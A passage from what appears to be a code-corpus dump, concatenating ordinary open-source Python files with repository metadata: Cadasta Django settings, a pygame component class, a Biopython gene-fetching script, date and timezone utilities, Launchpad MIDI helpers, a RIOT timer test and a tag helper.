'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.auth.middleware.SessionAuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.security.SecurityMiddleware',
'audit_log.middleware.UserLoggingMiddleware',
'simple_history.middleware.HistoryRequestMiddleware',
'accounts.middleware.UserLanguageMiddleware',
'django_otp.middleware.OTPMiddleware',
)
REST_FRAMEWORK = {
'DEFAULT_AUTHENTICATION_CLASSES': (
'rest_framework.authentication.TokenAuthentication',
'rest_framework.authentication.BasicAuthentication',
'rest_framework.authentication.SessionAuthentication',
'rest_framework_tmp_scoped_token.TokenAuth',
),
'DEFAULT_PERMISSION_CLASSES': (
'rest_framework.permissions.IsAuthenticated',
),
'DEFAULT_VERSIONING_CLASS':
'rest_framework.versioning.NamespaceVersioning',
'DEFAULT_VERSION': 'v1',
'EXCEPTION_HANDLER': 'core.views.api.exception_handler',
'DEFAULT_PAGINATION_CLASS':
'rest_framework.pagination.LimitOffsetPagination',
'PAGE_SIZE': 100,
'HTML_SELECT_CUTOFF': 100,
}
SITE_NAME = 'Cadasta'
BASE_TEMPLATE_DIR = os.path.join(os.path.dirname(BASE_DIR), 'templates')
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [BASE_TEMPLATE_DIR,
os.path.join(BASE_TEMPLATE_DIR, 'allauth')],
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader'
],
},
},
]
AUTHENTICATION_BACKENDS = [
'core.backends.Auth',
'django.contrib.auth.backends.ModelBackend',
'accounts.backends.AuthenticationBackend',
'accounts.backends.PhoneAuthenticationBackend'
]
ACCOUNT_AUTHENTICATION_METHOD = 'username_email'
DJOSER = {
'SITE_NAME': SITE_NAME,
'SET_PASSWORD_RETYPE': True,
'PASSWORD_RESET_CONFIRM_RETYPE': True,
'PASSWORD_RESET_CONFIRM_URL':
'account/password/reset/confirm/{uid}/{token}',
'ACTIVATION_URL': 'account/activate/{uid}/{token}',
# 'SEND_ACTIVATION_EMAIL': True,
'SERIALIZERS': {
'set_password_retype': 'accounts.serializers.ChangePasswordSerializer'
}
}
CORS_ORIGIN_ALLOW_ALL = False
LOGIN_REDIRECT_URL = '/dashboard/'
LOGIN_URL = '/account/login/'
LOGOUT_URL = '/account/logout/'
WSGI_APPLICATION = 'config.wsgi.application'
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_EMAIL_CONFIRMATION_ANONYMOUS_REDIRECT_URL = LOGIN_URL
ACCOUNT_EMAIL_CONFIRMATION_EXPIRE_DAYS = 2
ACCOUNT_FORMS = {
'signup': 'accounts.forms.RegisterForm',
'profile': 'accounts.forms.ProfileForm',
}
ACCOUNT_ADAPTER = 'accounts.adapter.DefaultAccountAdapter'
ACCOUNT_LOGOUT_ON_GET = True
ACCOUNT_LOGOUT_REDIRECT_URL = LOGIN_URL
ACCOUNT_LOGIN_ATTEMPTS_TIMEOUT = 86400
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': ('django.contrib.auth.'
'password_validation.UserAttributeSimilarityValidator'),
},
{
'NAME':
'django.contrib.auth.password_validation.MinimumLengthValidator',
'OPTIONS': {
'min_length': 10,
}
},
{
'NAME':
'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME':
'django.contrib.auth.password_validation.NumericPasswordValidator',
},
{
'NAME':
'accounts.validators.CharacterTypePasswordValidator'
},
{
'NAME':
'accounts.validators.EmailSimilarityValidator'
},
]
OSM_ATTRIBUTION = _(
"Base map data © <a href=\"http://openstreetmap.org\">"
"OpenStreetMap</a> contributors under "
"<a href=\"http://opendatacommons.org/licenses/odbl/\">ODbL</a>"
)
DIGITALGLOBE_ATTRIBUTION = _("Imagery © DigitalGlobe")
DIGITALGLOBE_TILESET_URL_FORMAT = (
'https://{{s}}.tiles.mapbox.com/v4/digitalglobe.{}'
'/{{z}}/{{x}}/{{y}}.png?access_token='
'pk.eyJ1IjoiZGlnaXRhbGdsb2JlIiwiYSI6ImNpaHhtenBmZjAzYW1'
'1a2tvY2p3MnpjcGcifQ.vF1gH0mGgK31yeHC1k1Tqw'
)
LEAFLET_CONFIG = {
'TILES': [
(
_("OpenStreetMap"),
'https://{s}.tile.openstreetmap.org/{z}/{x}/{y}.png',
{'attribution': OSM_ATTRIBUTION,
'maxZoom': 19}
),
(
_("+Vivid imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6ngnadl'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("Recent imagery"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0g75k'),
{'attribution': DIGITALGLOBE_ATTRIBUTION,
'maxZoom': 22}
),
(
_("+Vivid imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('n6nhclo2'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
(
_("Recent imagery with OpenStreetMap"),
DIGITALGLOBE_TILESET_URL_FORMAT.format('nal0mpda'),
{'attribution': (OSM_ATTRIBUTION, DIGITALGLOBE_ATTRIBUTION),
'maxZoom': 22}
),
],
'RESET_VIEW': False,
'PLUGINS': {
'draw': {
'js': '/static/leaflet/draw/leaflet.draw.js'
},
'groupedlayercontrol': {
'js': '/static/js/leaflet.groupedlayercontrol.min.js',
'css': '/static/css/leaflet.groupedlayercontrol.min.css'
}
}
}
# Invalid names for Cadasta organizations, projects, and usernames
CADASTA_INVALID_ENTITY_NAMES = ['add', 'new']
# Internationalization
# https://docs.djangoproject.com/en/1.8/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
LOCALE_PATHS = [os.path.join(BASE_DIR, 'locale')]
LANGUAGES = [
# ('ar', _('Arabic')), (hiding until RTL support fixed)
('en', _('English')),
('fr', _('French')),
# ('de', _('German')), (hiding until translation coverage >= 75%)
('es', _('Spanish')),
('id', _('Indonesian')),
('it', _('Italian')),
('pt', _('Portuguese'))
# ('sw', _('Swahili')), (hiding until translation coverage >= 75%)
]
MEASUREMENT_DEFAULT = 'metric'
MEASUREMENTS = [
('metric', _('Metric')),
('imperial', _('Imperial')),
]
DEFAULT_AVATAR = '/static/img/avatar_sm.jpg'
ACCEPTED_AVATAR_TYPES = ['image/png', 'image/jpeg']
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.8/howto/static-files/
MEDIA_ROOT = '/opt/cadasta/media'
MEDIA_URL = '/media/'
STATIC_ROOT = '/opt/cadasta/static'
STATIC_URL = '/static/'
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
'sass_processor.finders.CssFinder',
'compressor.finders.CompressorFinder',
)
# Required for bootstrap-sass
# https://github.com/jrief/django-sass-processor
SASS_PRECISION = 8
SASS_PROCESSOR_ROOT = os.path.join(STATIC_ROOT, 'cache')
SASS_PROCESSOR_INCLUDE_DIRS = (
'/opt/cadasta/node_modules',
)
SASS_OUTPUT_STYLE = 'compressed'
# django-compressor
# https://django-compressor.readthedocs.io/en/latest/
# change to false for debug
COMPRESS_ENABLED = True
COMPRESS_CSS_FILTERS = (
'compressor.filters.css_default.CssAbsoluteFilter',
'compressor.filters.cssmin.CSSMinFilter',
)
COMPRESS_URL = STATIC_URL
COMPRESS_ROOT = STATIC_ROOT
COMPRESS_STORAGE = 'compressor.storage.GzipCompressorFileStorage'
COMPRESS_OUTPUT_DIR = 'cache'
JSONATTRS_SCHEMA_SELECTORS = {
'spatial.spatialunit': (
'project.organization.pk',
'project.pk', 'project.current_questionnaire'
),
'spatial.spatialrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.party': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire',
'type'
),
'party.partyrelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
),
'party.tenurerelationship': (
'project.organization.pk', 'project.pk',
'project.current_questionnaire'
)
}
ATTRIBUTE_GROUPS = {
'location_attributes': {
'app_label': 'spatial',
'model': 'spatialunit',
'label': 'Location'
},
'party_attributes': {
'app_label': 'party',
'model': 'party',
'label': 'Party'
},
'location_relationship_attributes': {
'app_label': 'spatial',
'model': 'spatialrelationship',
'label': 'Spatial relationship'
},
'party_relationship_attributes': {
'app_label': 'party',
'model': 'partyrelationship',
'label': 'Party relationship'
},
'tenure_relationship_attributes': {
'app_label': 'party',
'model': 'tenurerelationship',
'label': 'Tenure Relationship'
}
}
ICON_URL = ('https://s3-us-west-2.amazonaws.com/cadasta-resources'
'/icons/{}.png')
ICON_LOOKUPS = {
'application/pdf': 'pdf',
'audio/1d-interleaved-parityfec': 'audio',
'audio/32kadpcm': 'audio',
'audio/3gpp': 'audio',
'audio/3gpp2': 'audio',
'audio/ac3': 'audio',
'audio/aac': 'audio',
'audio/aacp': 'audio',
'audio/amr': 'audio',
'audio/amr-wb': 'audio',
'audio/amr-wb+': 'audio',
'audio/aptx': 'audio',
'audio/asc': 'audio',
'audio/ATRAC-ADVANCED-LOSSESS': 'audio',
'audio/ATRAC-X': 'audio',
'audio/ATRAC3': 'audio',
'audio/basic': 'audio',
'audio/BV16': 'audio',
'audio/BV32': 'audio',
'audio/clearmode': 'audio',
'audio/CN': 'audio',
'audio/DAT12': 'audio',
'audio/dls': 'dls',
'audio/dsr-es201108': 'audio',
'audio/dsr-es202050': 'audio',
'audio/dsr-es202211': 'audio',
'audio/dsr-es202212': 'audio',
'audio/DV': 'audio',
'audio/DV14': 'audio',
'audio/eac3': 'audio',
'audio/encaprtp': 'audio',
'audio/EVRC': 'audio',
'audio/EVRC-QCP': 'audio',
'audio/EVRC0': 'audio',
'audio/EVRC1': 'audio',
'audio/EVRCB': 'audio',
'audio/EVRCB0': 'audio',
'audio/EVRCB1': 'audio',
'audio/EVRCNW': 'audio',
'audio/EVRCNW0': 'audio',
'audio/EVRCNW1': 'audio',
'audio/EVRCWB': 'audio',
'audio/EVRCWB0': 'audio',
'audio/EVRCWB1': 'audio',
'audio/EVS': 'audio',
'audio/example': 'audio',
'audio/fwdred': 'audio',
'audio/G711-0': 'audio',
'audio/G719': 'audio',
'audio/G7221': 'audio',
'audio/G722': 'audio',
'audio/G723': 'audio',
'audio/G726-16': 'audio',
'audio/G726-24': 'audio',
'audio/G726-32': 'audio',
'audio/G726-40': 'audio',
'audio/G728': 'audio',
'audio/G729': 'audio',
'audio/G7291': 'audio',
'audio/G729D': 'audio',
'audio/G729E': 'audio',
'audio/GSM': 'audio',
'audio/GSM-EFR': 'audio',
'audio/GSM-HR-08': 'audio',
'audio/iLBC': 'audio',
'audio/ip-mr_v2.5': 'audio',
'audio/L8': 'audio',
'audio/L16': 'audio',
'audio/L20': 'audio',
'audio/L24': 'audio',
'audio/LPC': 'audio',
'audio/mobile-xmf': 'audio',
'audio/MPA': 'audio',
'audio/MP4A-LATM': 'audio',
'audio/mpa-robust': 'audio',
'audio/m4a': 'audio',
'audio/midi': 'audio',
'audio/mpeg1': 'audio',
'audio/MPA2': 'audio',
'audio/mpa-robust3': 'audio',
'audio/mpeg3': 'mp3',
'audio/mpeg': 'mp3',
'audio/mp3': 'mp3',
'audio/mp4': 'mp4',
'audio/mpeg4-generic': 'mp4',
'audio/ogg': 'audio',
'audio/opus': 'audio',
'audio/parityfec': 'audio',
'audio/PCMA': 'audio',
'audio/PCMA-WB': 'audio',
'audio/PCMU': 'audio',
'audio/PCMU-WB': 'audio',
'audio/QCELP': 'audio',
'audio/raptorfec': 'audio',
'audio/RED': 'audio',
'audio/rtp-enc-aescm128': 'audio',
'audio/rtploopback': 'audio',
'audio/rtp-midi': 'audio',
'audio/rtx': 'audio',
'audio/SMV': 'audio',
'audio/SMV0': 'audio',
'audio/SMV-QCP': 'audio',
'audio/sp-midi': 'audio',
'audio/speex': 'audio',
'audio/t140c': 'audio',
'audio/t38': 'audio',
'audio/telephone-event': 'audio',
'audio/tone': 'audio',
'audio/UEMCLIP': 'audio',
'audio/ulpfec': 'audio',
'audio/VDVI': 'audio',
'audio/VMR-WB': 'audio',
'audio/vorbis': 'audio',
'audio/vorbis-config': 'audio',
'audio/wav': 'audio',
'audio/wave': 'audio',
'audio/x-flac': 'audio',
'audio/x-mpeg-3': 'mp3',
'audio/x-midi': 'audio',
'audio/x-wav': 'audio',
'video/mpeg': 'mp3',
'video/x-mpeg': 'mp3',
'video/mp4': 'mp4',
'application/msword': 'doc',
'application/vnd.openxmlformats-officedocument.'
'wordprocessingml.document': 'docx',
'application/msexcel': 'xls',
'application/vnd.ms-excel': 'xls',
'application/vnd.openxmlformats-'
'officedocument.spreadsheetml.sheet': 'xlsx',
'text/xml': 'xml',
'application/xml': 'xml',
'text/csv': 'csv',
'text/plain': 'csv',
'image/jpeg': 'jpg',
'image/png': 'png',
'image/gif': 'gif',
'image/tif': 'tiff',
'image/tiff': 'tiff',
'image/bmp': 'image',
'image/x-windows-bmp': 'image',
'application/gpx+xml': 'gpx',
'application/rtf': 'doc',
'application/x-rtf': 'doc',
'application/postscript': 'doc',
'application/x-troff-msvideo': 'video',
'video/avi': 'avi',
'video/msvideo': 'wmv',
'video/x-msvideo': 'wmv',
'video/x-ms-wmv': 'wmv',
'video/quicktime': 'video',
'application/ogg': 'audio',
'image/svg+xml': 'svg',
'audio/x-ms-wma': 'audio',
'application/vnd.oasis.opendocument.spreadsheet': 'ods',
'application/vnd.oasis.opendocument.text': 'odt',
'application/vnd.oasis.opendocument.presentation': 'odd',
'application/vnd.ms-powerpoint': 'ppt',
'application/vnd.openxmlformats-officedocument.presentationml.'
'presentation': 'pptx',
'application/x-iwork-keynote-sffkey': 'key',
'video/x-m4v': 'mp4',
'video/x-matroska': 'video',
}
MIME_LOOKUPS = {
'gpx': 'application/gpx+xml'
}
FILE_UPLOAD_HANDLERS = [
'django.core.files.uploadhandler.TemporaryFileUploadHandler',
]
# The first hasher in this list is the preferred algorithm. Any
# password hashed with a different algorithm will be converted
# automatically upon login.
PASSWORD_HASHERS = [
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
IMPORTERS = {
'csv': 'organization.importers.csv.CSVImporter',
'xls': 'organization.importers.xls.XLSImporter'
}
ES_SCHEME = 'http'
ES_HOST = 'localhost'
ES_PORT = '9200'
ES_MAX_RESULTS = 10000
TOTP_TOKEN_VALIDITY = 3600
TOTP_DIGITS = 6
SMS_GATEWAY = 'accounts.gateways.FakeGateway'
TWILIO_ACCOUNT_SID = os.environ.get('TWILIO_ACCOUNT_SID')
TWILIO_AUTH_TOKEN = os.environ.get('TWILIO_AUTH_TOKEN')
TWILIO_PHONE = '+123'
# Async Tooling
CELERY_BROKER_TRANSPORT = 'sqs' if os.environ.get('SQS') else 'memory'
CELERY_QUEUE_PREFIX = os.environ.get('QUEUE_PREFIX', 'dev')
|
Cadasta/cadasta-platform
|
cadasta/config/settings/default.py
|
Python
|
agpl-3.0
| 17,780 | 0 |
"""
Base class for all nodes in the scene graph. It is implemented
using the composite pattern.
Responsibilities:
- Hold the relative position to its parent.
- Blit itself on the parent.
- Dirty flag itself to trigger regeneration of surface.
"""
class Component(object):
def __init__(self):
self._position = (0, 0)
self._dirty = True
self._surface = None
def draw(self, parent):
self._recreate_surface()
if self._surface and parent:
parent.blit(self._surface, self._position)
def set_position(self, position):
self._position = position
def surface(self):
return None
def dirty(self):
self._dirty = True
def _recreate_surface(self):
if self._dirty:
self._surface = self.surface()
self._dirty = False
"""
Decorator to mark component methods that change the look
of the surface and therefore need to trigger regeneration.
"""
def recreate_surface(function):
def wrapper(self, *args):
self.dirty()
return function(self, *args)
return wrapper
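# Usage sketch (illustrative only; Label and render_text are assumptions, not
# part of the original project): a concrete component overrides surface() and
# marks mutating methods with @recreate_surface so the cached surface is only
# rebuilt on the next draw().
#     class Label(Component):
#         def __init__(self, text):
#             super(Label, self).__init__()
#             self._text = text
#         @recreate_surface
#         def set_text(self, text):
#             self._text = text
#         def surface(self):
#             return render_text(self._text)  # hypothetical rendering helper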
|
sirmar/tetris
|
tetris/visibles/component.py
|
Python
|
mit
| 1,102 | 0.002722 |
from Bio import Entrez
from Bio import SeqIO
from Bio import Seq
from Bio.Alphabet import IUPAC
genomes = ["Escherichia coli str. K-12 substr. MC4100 complete genome","Escherichia coli Nissle 1917, complete genome","Escherichia coli LY180, complete genome"]
genomes_short = ["K12","Nissle","LY180"]
for n,genome in enumerate(genomes):
Entrez.email = "[email protected]"
handle = Entrez.esearch(db="nucleotide", term=genome)
records = Entrez.read(handle)
handle.close()
handle = Entrez.efetch(db="nucleotide", id=records['IdList'][0], rettype="gb", retmode="text")
record = SeqIO.read(handle, "genbank")
handle.close()
mygenes = ["thrA","mogA","dnaK","nhaA","ksgA"]
output_handle=open("seq"+str(n+1)+".fna","w")
for feature in record.features:
if feature.type=='CDS':
if 'gene' in feature.qualifiers:
if feature.qualifiers['gene'][0] in mygenes:
output_handle.write(">%s_%s\n%s\n" % (feature.qualifiers['gene'][0], genomes_short[n], str(feature.extract(record.seq))))
output_handle.close()
|
gditzler/bio-course-materials
|
blast/get_seq.py
|
Python
|
gpl-3.0
| 1,093 | 0.014639 |
from pylons_common.lib.log import create_logger
from pylons_common.lib.utils import pluralize
logger = create_logger('pylons_common.lib.datetime')
from datetime import datetime, timedelta
DATE_FORMAT_ACCEPT = [u'%Y-%m-%d %H:%M:%S', u'%Y-%m-%d %H:%M:%SZ', u'%Y-%m-%d', u'%m-%d-%Y', u'%m/%d/%Y', u'%m.%d.%Y', u'%b %d, %Y']
popular_timezones = [u'US/Eastern', u'US/Central', u'US/Mountain', u'US/Pacific', u'US/Alaska', u'US/Hawaii', u'US/Samoa',
u'Europe/London', u'Europe/Paris', u'Europe/Istanbul', u'Europe/Moscow',
u'America/Puerto_Rico', u'America/Buenos_Aires', u'America/Sao_Paulo',
u'Asia/Dubai', u'Asia/Calcutta', u'Asia/Rangoon', u'Asia/Bangkok', u'Asia/Hong_Kong', u'Asia/Tokyo',
u'Australia/Brisbane', u'Australia/Sydney',
u'Pacific/Fiji']
def convert_date(value):
"""
converts a string into a datetime object
"""
if not value:
return None
if isinstance(value, datetime):
return value
def try_parse(val, format):
try:
dt = datetime.strptime(val, format)
except ValueError:
dt = None
return dt
converted_value = None
for format in DATE_FORMAT_ACCEPT:
converted_value = converted_value or try_parse(value, format)
if not converted_value:
raise ValueError('Cannot convert supposed date %s' % value)
return converted_value
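# Examples (added sketch): convert_date("2014-03-07"), convert_date("03/07/2014")
# and convert_date("Mar 07, 2014") all yield datetime(2014, 3, 7, 0, 0), while a
# string matching none of DATE_FORMAT_ACCEPT raises ValueError.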
def get_timezones():
import pytz
timezones = {0:u'UTC'}
for tzname in pytz.common_timezones:
tzname = tzname.decode('utf-8')
tz = pytz.timezone(tzname)
dt = datetime.utcnow()
# in theory, this is more elegant, but tz.dst (timezone daylight savings - 0 if off 1 if on) is returning 0 for everything
#offset = tz.utcoffset(dt) - tz.dst(dt)
# we do this try/except to avoid the possibility that pytz fails at localization
# see https://bugs.launchpad.net/pytz/+bug/207500
try:
offset = dt.replace(tzinfo=pytz.utc) - tz.localize(dt)
seconds = offset.days * 86400 + offset.seconds
minutes = seconds / 60
hours = minutes / 60
# adjust for offsets that are greater than 12 hours (these are repeats of other offsets)
if hours > 12:
hours = hours - 24
elif hours < -11:
hours = hours + 24
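            # Worked example (added): the subtraction above yields -5 hours for
            # US/Eastern and +9 for Asia/Tokyo, so the dict keys are signed UTC offsets.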
this_tz = timezones.get(hours, None)
if not this_tz:
timezones[hours] = tzname
elif tzname in popular_timezones:
# overwrite timezones with popular ones if equivalent
timezones[hours] = tzname
except:
logger.exception("Localization failure for timezone " + tzname)
return timezones
def relative_date_str(date, now=None, time=False):
'''
Will return a string like 'Today', 'Tomorrow' etc.
'''
if not now: now = datetime.utcnow()
if not date: return 'unknown'
diff = date.date() - now.date()
def day_time(day_str):
return '%s%s' % (day_str, time and ' at %s' % date.strftime("%I:%M %p") or '')
if diff.days == 0:
return day_time('Today')
elif diff.days == -1:
return day_time('Yesterday')
elif diff.days == 1:
return day_time('Tomorrow')
elif diff.days < 0 and diff.days >= -7:#Within one week back
return '%s ago' % pluralize(-diff.days, '{0} days', '1 day')
elif diff.days > 0 and diff.days < 7:#Within one week back
return 'in %s' % pluralize(diff.days, '{0} days', '1 day')
else:
        return date.strftime("%b %e, %Y")  # e.g. "Oct  3, 1980"
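# Examples (added sketch, assuming pluralize fills in the count): with
# now = datetime(2014, 3, 7), a date of 2014-03-08 gives 'Tomorrow' and
# 2014-03-04 gives '3 days ago'; dates more than a week away in either
# direction fall through to the "%b %e, %Y" formatting above.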
def now():
return datetime.utcnow()
|
benogle/pylons_common
|
pylons_common/lib/date.py
|
Python
|
mit
| 3,799 | 0.010266 |
#
# This file contains functions and constants to talk
# to and from a Novation Launchpad via MIDI.
#
# Created by paul for mididings.
from mididings import *
# MEASURES - constants useful for the Pad
side = list(range(0, 8))
longside = list(range(0, 9))
step = 16 # vertical gap on pad
FirstCtrl = 104 # ctrl of first toprow key
# COLORS
# Colors on the Launchpad are determined by event velocity/value.
# Each key can be lit with red or green light (or both),
# with brightness 0 (off) - 3 (max).
# For convenience, define also the constants:
black = 4 # better not to use zero
red = 3
orange = 19
green = 48
yellow = 51 # better not to use 127
# If you want a darker variant of the above, use fractions (thirds).
# For example, green*2/3 is darker green. (Not for orange!)
def color(g, r):
"This gives the Launchpad color given the amount of green and red."
if g + r == 0:
return black # not zero
else:
return (16 * g) + r
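# Worked examples (added): color(3, 0) == 48 (bright green), color(0, 3) == 3
# (bright red), color(3, 3) == 51 (yellow), and color(0, 0) returns black == 4
# so the resulting velocity is never zero.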
# KEYS
# Each key on the Launchpad is activated by a MIDI event.
# The square keys and the right keys are notes,
# the top keys are control events.
# Rows and columns given the keys (starting from 0)
def row(x):
"This tells the row of the event (square or right)"
return x // step
def column(x):
"This tells us the column of event (right = 8)"
return x % step
def topcol(x):
"The same as colums, but for the top row"
return x - FirstCtrl
# Now the inverses: functions that point exactly to a key on the Launchpad
def right(row):
"This gives the note of a right key at position row"
return (row * step) + 8
def square(row, col):
"This gives the note of a square key at position row,col"
return (row * step) + col
def top(col):
"This gives the ctrl of a top key at position col"
return col + FirstCtrl
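# Worked example (added): square(2, 5) == 37, so row(37) == 2 and column(37) == 5;
# right(2) == 40 is the round key of the same row, and top(5) == 109 is the ctrl
# number of the sixth top-row key.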
# KEY FILTERS
# First filters for notes from square, top, and right keys.
OnlySquare = Filter(NOTE) >> KeyFilter(notes=[square(i, j)
for i in side for j in side])
OnlyRight = KeyFilter(notes=[right(i) for i in side])
OnlyTop = Filter(CTRL) >> CtrlFilter(FirstCtrl + i for i in side)
# Now filters for rows, columns, and single keys.
def RowSqFilter(row):
    "This selects only square notes from the specified row (right key excluded)"
    return KeyFilter(row * step, right(row)) # no right
def RowFilter(row):
    "This selects notes from the specified row, including the right key"
    return KeyFilter(row * step, right(row) + 1) # also right
def ColumnFilter(col):
"This selects only notes from specified column"
return KeyFilter(notes=[square(i, col) for i in side])
def TopFilter(col):
"This selects only specified key from top row"
return CtrlFilter(top(col))
def RightFilter(row):
"This selects only specified key from right"
return KeyFilter(right(row))
def SquareFilter(row, col):
"This selects only specified key from square"
return KeyFilter(square(row, col))
# KEY GENERATORS
def SquareKey(row, col):
"This creates square note with given row and column"
return Key(square(row, col))
def RightKey(row):
"This creates right note with given row"
return Key(right(row))
def TopKey(col, val):
"This creates top ctrl with given column"
return Ctrl(top(col), val)
# NOTES
A = 21
B = 23
C = 24
D = 26
E = 28
F = 29
G = 31
Octave = 12 # semitones
minors = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
minharms = { # scale
0: 0, # interval in semitones
1: 2,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 11, # harmonic
}
majors = {
0: 0,
1: 2,
2: 4,
3: 5,
4: 7,
5: 9,
6: 11,
7: 12,
}
dorics = {
0: 0,
1: 2,
2: 3,
3: 5,
4: 7,
5: 9,
6: 10,
7: 12,
}
phrygians = {
0: 0,
1: 1,
2: 3,
3: 5,
4: 7,
5: 8,
6: 10,
7: 12,
}
# I only use these scales - feel free to add your own!
# Now the same thing, but to feed into Transpose:
Minor = [minors[i] - i for i in side]
MinHarm = [minharms[i] - i for i in side]
Major = [majors[i] - i for i in side]
Doric = [dorics[i] - i for i in side]
Phrygian = [phrygians[i] - i for i in side]
# How to use it in practice:
def OctFilter(col, tonic):
return KeyFilter(notes=[(tonic + col + (i * Octave)) for i in longside])
def MakeScale(tonic, scale):
return [OctFilter(i, tonic) >> Transpose(scale[i]) for i in side]
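# Usage sketch (added; exact wiring is an assumption and depends on the rest of
# the mididings patch): MakeScale(C + Octave * 2, Minor) yields one
# OctFilter >> Transpose unit per scale degree; mididings treats such a list as
# parallel branches, so it can be dropped into a patch as a single element.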
|
m4773rcl0ud/launchpaddings
|
launchpad_utils.py
|
Python
|
gpl-3.0
| 4,442 | 0.00045 |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# vim:fenc=utf-8
# Copyright (C) 2017 Francisco Acosta <[email protected]>
# 2017 Freie Universität Berlin
#
# This file is subject to the terms and conditions of the GNU Lesser
# General Public License v2.1. See the file LICENSE in the top level
# directory for more details.
import sys
import time
from testrunner import run
US_PER_SEC = 1000000
INTERNAL_JITTER = 0.05
EXTERNAL_JITTER = 0.15
class InvalidTimeout(Exception):
pass
def testfunc(child):
child.expect(u"Running test (\\d+) times with (\\d+) distinct sleep times")
RUNS = int(child.match.group(1))
SLEEP_TIMES_NUMOF = int(child.match.group(2))
try:
child.expect_exact(u"Please hit any key and then ENTER to continue")
child.sendline(u"a")
start_test = time.time()
for m in range(RUNS):
for n in range(SLEEP_TIMES_NUMOF):
child.expect(u"Slept for (\\d+) us \\(expected: (\\d+) us\\) Offset: (-?\\d+) us")
sleep_time = int(child.match.group(1))
exp = int(child.match.group(2))
upper_bound = exp + (exp * INTERNAL_JITTER)
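                # Worked example (added): exp = 1000 us with INTERNAL_JITTER 0.05
                # gives an accepted window of 1000 us < sleep_time < 1050 us.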
if not (exp < sleep_time < upper_bound):
delta = (upper_bound-exp)
error = min(upper_bound-sleep_time, sleep_time-exp)
raise InvalidTimeout("Invalid timeout %d, expected %d < timeout < %d"
"\nHost max error\t%d\nerror\t\t%d" %
(sleep_time, exp, upper_bound,
delta, error))
testtime = (time.time() - start_test) * US_PER_SEC
child.expect(u"Test ran for (\\d+) us")
exp = int(child.match.group(1))
lower_bound = exp - (exp * EXTERNAL_JITTER)
upper_bound = exp + (exp * EXTERNAL_JITTER)
if not (lower_bound < testtime < upper_bound):
raise InvalidTimeout("Host timer measured %d us (client measured %d us)" %
(testtime, exp))
except InvalidTimeout as e:
print(e)
sys.exit(1)
if __name__ == "__main__":
sys.exit(run(testfunc))
|
mfrey/RIOT
|
tests/xtimer_usleep/tests/01-run.py
|
Python
|
lgpl-2.1
| 2,231 | 0.001345 |
from flask import g
import re
from sqlalchemy import and_
from sqlalchemy.orm.exc import NoResultFound
from newparp.model import (
CharacterTag,
Tag,
)
special_char_regex = re.compile("[\\ \\./]+")
underscore_strip_regex = re.compile("^_+|_+$")
def name_from_alias(alias):
# 1. Change to lowercase.
# 2. Change spaces to underscores.
# 3. Change . and / to underscores because they screw up the routing.
# 4. Strip extra underscores from the start and end.
return underscore_strip_regex.sub(
"",
special_char_regex.sub("_", alias)
).lower()
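# Examples (added): name_from_alias("Dave Strider") == "dave_strider" and
# name_from_alias(" A.B./C ") == "a_b_c" -- runs of spaces, dots and slashes
# collapse into single underscores and leading/trailing underscores are stripped.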
def character_tags_from_form(form):
tag_dict = {}
for tag_type in ("fandom", "character", "gender"):
for alias in form[tag_type].split(","):
alias = alias.strip()
if alias == "":
continue
name = name_from_alias(alias)
if name == "":
continue
tag_dict[(tag_type, name)] = alias
character_tags = []
used_ids = set()
for (tag_type, name), alias in tag_dict.items():
try:
tag = g.db.query(Tag).filter(and_(
Tag.type == tag_type, Tag.name == name,
)).one()
except NoResultFound:
tag = Tag(type=tag_type, name=name)
g.db.add(tag)
g.db.flush()
tag_id = (tag.synonym_id or tag.id)
# Remember IDs to skip synonyms.
if tag_id in used_ids:
continue
used_ids.add(tag_id)
character_tags.append(CharacterTag(tag_id=tag_id, alias=alias))
return character_tags
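# Example (added sketch; the field values are illustrative): a form such as
# {"fandom": "Homestuck", "character": "Dave Strider, Rose Lalonde", "gender": "male"}
# produces one CharacterTag per distinct (type, name) pair, reusing existing Tag
# rows (or their synonyms) and creating any that are missing.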
|
MSPARP/newparp
|
newparp/helpers/tags.py
|
Python
|
agpl-3.0
| 1,613 | 0 |
from django.db import models
from django.test import TestCase
from .models import (
Book, Car, CustomManager, CustomQuerySet, DeconstructibleCustomManager,
FastCarAsBase, FastCarAsDefault, FunPerson, OneToOneRestrictedModel,
Person, PersonFromAbstract, PersonManager, PublishedBookManager,
RelatedModel, RestrictedModel,
)
class CustomManagerTests(TestCase):
custom_manager_names = [
'custom_queryset_default_manager',
'custom_queryset_custom_manager',
]
@classmethod
